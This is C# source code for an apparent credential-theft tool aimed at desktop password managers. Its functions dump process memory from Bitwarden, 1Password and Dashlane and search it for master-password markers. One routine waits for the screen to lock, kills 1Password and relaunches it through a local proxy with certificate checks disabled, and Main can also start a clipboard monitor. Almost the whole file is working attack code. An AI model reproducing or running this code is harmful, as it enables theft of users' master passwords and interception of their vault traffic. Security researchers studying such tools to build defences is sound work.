public static void dumpBitwardenMaster() { //Process[] procs = Process.GetProcessesByName("Bitwarden.exe"); Process[] procs = Process.GetProcessesByName("BiTWarDen"); Console.WriteLine("[DEBUG] Number of Processes Found: {0}", procs.Length); foreach (var proc in procs) { DebugFunctions.writeDebug(String.Format("Enumerating Process: {0} - {1}", proc.Id, proc.ProcessName), Globals.DebugMode); string strResult = MemoryHelper.dumpProcessMemory(proc); //var matches = Regex.Matches(strResult, "offline_access").Cast<Match>().Select(m => m.Index); //foreach (var match in matches) //{ // Console.WriteLine(match); //} //Maybe convert this to a regex. Shouldn't take a long time and end with a cleaner result. if (strResult.Contains("\"amr\":[\"Application\"]}")) { DebugFunctions.writeDebug("Found String Indicator, attempting to pull password", Globals.DebugMode); int start, end; start = strResult.IndexOf("\"amr\":[\"Application\"]}", 0); end = start + 100; Console.WriteLine("[SUCCESS] Potential Bitwarden Password Location found! {0}", strResult.Substring(start, end - start).Split('\0')[1]); return; } else { Console.WriteLine("[-] Unable to locate Master Password in this process."); } } //endfor Console.WriteLine("[-] Unable to locate Master Password in any process."); }
public static void LaunchWithProxy(bool force) { //Check if screen is locked. //Need to fix this because it only checks for a lock change notification, and doesn't determine if the screen is locked. if (!force) { DebugFunctions.writeDebug("Waiting for Screen to lock before bouncing application", Globals.DebugMode); Monitoring.CheckForWorkstationLocking workLock = new Monitoring.CheckForWorkstationLocking(); workLock.Run(); Console.WriteLine("Press ESC to exit..."); while (!workLock.screenLocked) { //wait a bit before checking again. System.Threading.Thread.Sleep(10000); } ; DebugFunctions.writeDebug("Screen lock notification recieved, continuing.", Globals.DebugMode); } string procPath = ""; Process[] procs = Process.GetProcessesByName("1Password"); if (procs.Length < 1) { DebugFunctions.writeDebug("No Processes found", Globals.DebugMode); } foreach (var proc in procs) { if (procPath == "") { procPath = proc.MainModule.FileName; DebugFunctions.writeDebug("Getting Process Path: " + procPath, Globals.DebugMode); } //Kill All current Running Processes. proc.Kill(); } DebugFunctions.writeDebug("Starting Process with New Arguments", Globals.DebugMode); Process bw = new Process(); bw.StartInfo.FileName = procPath; bw.StartInfo.Arguments = "--proxy-server=http://127.0.0.1:8888 --ignore-certificate-errors"; bw.Start(); }
public static void dumpDashlaneMaster() { Process[] procs = Process.GetProcessesByName("dashlane"); Console.WriteLine("[DEBUG] Number of Processes Found: {0}", procs.Length); foreach (var proc in procs) { DebugFunctions.writeDebug(String.Format("Enumerating Process: {0} - {1}", proc.Id, proc.ProcessName), Globals.DebugMode); DebugFunctions.writeDebug("Dumping Memory", Globals.DebugMode); string strResult = DebugFunctions.ReturnCleanASCII(MemoryHelper.dumpProcessMemory(proc).Replace("\0", string.Empty)); DebugFunctions.writeDebug("Parsing Memory Dump. Warning this could take a while.", Globals.DebugMode); //string r = @"\s{3}(.+)\s{3}receiveNotif"; string r = @"\s{3}(.+)\0{3}"; foreach (Match m in Regex.Matches(strResult, r)) { Console.WriteLine("[DEBUG] '{0}' found at index {1}", DebugFunctions.ReturnCleanASCII(m.Value), m.Index); } DebugFunctions.writeDebug("Finished", Globals.DebugMode); Console.ReadKey(); } }
public static void dumpDashLanePasswords() { Console.WriteLine("[!] Not Fully Implemented Yet!"); return; //I'll come back to you, I promise. Process[] procs = Process.GetProcessesByName("Dashlane"); Console.WriteLine("[DEBUG] Number of Processes Found: {0}", procs.Length); foreach (var proc in procs) { string strResult = DebugFunctions.ReturnCleanASCII(MemoryHelper.dumpProcessMemory(proc).Replace("\0", string.Empty)); DebugFunctions.writeDebug("Parsing Memory Dump", Globals.DebugMode); //string r = @"\s{3}(.+)\s{3}receiveNotif"; string r = @"CDATA"; foreach (Match m in Regex.Matches(strResult, r)) { Console.WriteLine("[DEBUG] '{0}' found at index {1}", DebugFunctions.ReturnCleanASCII(m.Value), m.Index); } DebugFunctions.writeDebug("Finished", Globals.DebugMode); Console.ReadKey(); } }
//Enable Cleartext Passwords and then read memory. /** * "security": { * "concealPasswords": false * }, **/ //Step 1. Add that line to the 1Password //Step 2. Dump Memory(?) //Step 3. Passwords public static void dump1passwordMaster() { //Process[] procs = Process.GetProcessesByName("Bitwarden.exe"); Process[] procs = Process.GetProcessesByName("1Password"); Console.WriteLine("[DEBUG] Number of Processes Found: {0}", procs.Length); foreach (var proc in procs) { DebugFunctions.writeDebug(String.Format("Enumerating Process: {0} - {1}", proc.Id, proc.ProcessName), Globals.DebugMode); #region oldcode /** * //IntPtr hProc = proc.Handle; * IntPtr hProc = WinAPI.OpenProcess(WinAPI.ProcessAccessFlags.QueryInformation | WinAPI.ProcessAccessFlags.VirtualMemoryRead, false, proc.Id); * WinAPI.MEMORY_BASIC_INFORMATION64 mbi = new WinAPI.MEMORY_BASIC_INFORMATION64(); * //32 bit * //WinAPI.MEMORY_BASIC_INFORMATION mbi = new WinAPI.MEMORY_BASIC_INFORMATION() * WinAPI.SYSTEM_INFO si = new WinAPI.SYSTEM_INFO(); * if (hProc == IntPtr.Zero) * { * //Failed. * Console.WriteLine("Unable to create a connection to the process! Error Code: {0}", WinAPI.GetLastError()); * Environment.Exit(6); * } * * WinAPI.GetSystemInfo(out si); * IntPtr hProc_min_addr = si.minimumApplicationAddress; * IntPtr hProc_max_addr = si.maximumApplicationAddress; * long hProc_long_min = (long)hProc_min_addr; * long hProc_long_max = (long)hProc_max_addr; * string fileName = "dump-" + proc.Id + "-" + proc.ProcessName + "-2.txt"; * StreamWriter sw = new StreamWriter(fileName); * * int bytesRead = 0; * * while (hProc_long_min < hProc_long_max) * { * bytesRead = WinAPI.VirtualQueryEx(hProc, hProc_min_addr, out mbi, (uint)Marshal.SizeOf(typeof(WinAPI.MEMORY_BASIC_INFORMATION64))); * if (mbi.Protect == WinAPI.PAGE_READWRITE && mbi.State == WinAPI.MEM_COMMIT) * { * byte[] buffer = new byte[mbi.RegionSize]; * WinAPI.ReadProcessMemory(hProc, mbi.BaseAddress, buffer, mbi.RegionSize, ref bytesRead); * for (long i = 0; i < mbi.RegionSize; i++) * { * sw.Write((char)buffer[i]); * } * } * hProc_long_min += mbi.RegionSize; * hProc_min_addr = new IntPtr(hProc_long_min); * } * sw.Close(); * **/ #endregion //Slightly Dirty, but keeping the <LF> conversion to help rule out False Positives in output. Will need to re-visit this most likely. //string strResult = File.ReadAllText(fileName).Replace("\n", "<LF>").Replace("\0", String.Empty); string strResult = MemoryHelper.dumpProcessMemory(proc).Replace("\n", "<LF>").Replace("\0", String.Empty); if (strResult.Contains("{\"name\":\"master-password\",\"value\":\"")) { DebugFunctions.writeDebug("Found JSON Indicator, attempting to pull password", Globals.DebugMode); int start, end; start = strResult.IndexOf("{\"name\":\"master-password\",\"value\":\"", 0) + 35; end = strResult.IndexOf(",\"type\":\"P\",\"designation\":\"password\"},{\"name\":\"account-key\"", 0) - 1; Console.WriteLine("[+] Potential 1Password Password Location found: {0}", strResult.Substring(start, end - start)); return; } else if (strResult.Contains("on 1password.com.<LF>")) { DebugFunctions.writeDebug("First pass through didn't find anything, testing backup", Globals.DebugMode); int start, end; string strStartSearch = "on 1password.com.<LF>"; start = strResult.IndexOf(strStartSearch, 0) + 20; end = strResult.IndexOf("<LF>secret key<LF>"); Console.WriteLine("[+] Potential 1Password Password Location found: {0}", strResult.Substring(start, end - start)); return; } else { Console.WriteLine("[-] Unable to locate Master Password :("); Console.ReadKey(); } Console.WriteLine("Fin. Press any key to exit"); Console.ReadKey(); } }
static void Main(string[] args) { var parsed = Args.Parse <MyArgs>(args); if (parsed.Debug) { Globals.DebugMode = true; Console.WriteLine("[DEBUG] Debug mode enabled. Outputting debug messages"); } //var outFile = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\"; //var cache = MemoryCache.Default.PhysicalMemoryLimit; //Command Line Options //Local Flag allowing the processing of a memory dump from the local machine. //Get Processes if (parsed.Monitor) { Console.WriteLine("[+] Starting Clipboard Monitor"); Monitoring.Start(); } if (parsed.Local) { Console.WriteLine("[!] Not Implemented (yet)"); } if (parsed.Proxy) { string[] supportedManagers = { "bitwarden", "1password" }; if (String.IsNullOrEmpty(parsed.Manager)) { Console.WriteLine("[!] Please specify a password manager with the -Manager flag!"); return; } if (!supportedManagers.Any(parsed.Manager.ToString().ToLower().Contains)) { Console.WriteLine("[!] Sorry, that password manager is not yet supported"); return; } new Thread(() => { Thread.CurrentThread.IsBackground = true; DebugFunctions.writeDebug("Starting Proxy. Press any key to quit.", Globals.DebugMode); ProxyHelper.startProxy(); }).Start(); switch (parsed.Manager.ToLower()) { case "bitwarden": BitWarden.LaunchWithProxy(parsed.Force); break; case "1password": _1Password.LaunchWithProxy(parsed.Force); break; } Console.ReadKey(); DebugFunctions.writeDebug("Stopping Proxy.", Globals.DebugMode); ProxyHelper.DoQuit(); DebugFunctions.writeDebug("Proxy stopped, Press any key to exit.", Globals.DebugMode); Console.ReadKey(); return; } else if (parsed.GetMaster) { switch (parsed.Manager.ToLower()) { case "bitwarden": Console.WriteLine("[+] Checking for Bitwarden Executables."); BitWarden.dumpBitwardenMaster(); Console.ReadKey(); break; case "1password": Console.WriteLine("[+] Checking for 1Password Executables."); _1Password.dump1passwordMaster(); break; case "keepass": //Initiate KeePass stuff. Console.WriteLine("[-] Not currently implemented for KeePass, but checked out HarmJ0y's KeeThief located at https://github.com/HarmJ0y/KeeThief"); break; case "dashlane": Dashlane.dumpDashlaneMaster(); break; default: Console.WriteLine("[-] Password manager not currently supported!"); break; } return; } else if (parsed.Dump) { if (String.IsNullOrEmpty(parsed.Manager)) { Console.WriteLine("[!] Please specify a password manager with the -Manager flag!"); return; } switch (parsed.Manager) { case "bitwarden": Console.WriteLine("[!] This functionality is not yet supported!"); break; default: Console.WriteLine("[!] This functionality is not yet supported!"); break; } return; } else { Console.WriteLine("[!] No Options Selected"); } }